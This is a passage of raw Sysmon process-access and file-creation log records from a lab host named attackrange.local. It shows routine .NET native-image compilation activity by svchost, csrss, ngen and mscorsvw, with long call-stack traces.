4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:35.553{59A5CD1D-9267-6005-9404-00000000A301}2640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\a50-0\System.Windows.Input.Manipulations.dll2021-01-18 13:51:35.553 10341000x80000000000000008834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:35.459{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9267-6005-9404-00000000A301}2640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.444{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9267-6005-9404-00000000A301}2640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:35.444{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9267-6005-9404-00000000A301}2640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:35.397{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9267-6005-9304-00000000A301}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.381{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9267-6005-9304-00000000A301}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:35.381{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9267-6005-9304-00000000A301}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:35.319{59A5CD1D-9267-6005-9204-00000000A301}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c34-0\System.Windows.Forms.DataVisualization.Design.dll2021-01-18 13:51:35.319 10341000x80000000000000008827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:35.178{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9267-6005-9204-00000000A301}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.162{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9267-6005-9204-00000000A301}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:35.162{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9267-6005-9204-00000000A301}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:35.100{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9267-6005-9104-00000000A301}1512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.100{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9267-6005-9104-00000000A301}1512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:35.100{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9267-6005-9104-00000000A301}1512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:36.194{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9268-6005-9804-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:36.194{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9268-6005-9804-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:36.194{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9268-6005-9804-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:37.819{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9269-6005-9A04-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:37.803{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9269-6005-9A04-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:37.803{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9269-6005-9A04-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:37.709{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9269-6005-9904-00000000A301}804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:37.694{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9269-6005-9904-00000000A301}804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:37.694{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9269-6005-9904-00000000A301}804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:37.569{59A5CD1D-9268-6005-9804-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\a20-0\System.Workflow.Activities.dll2021-01-18 13:51:37.569 10341000x80000000000000008858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:39.990{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-926B-6005-9B04-00000000A301}1404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 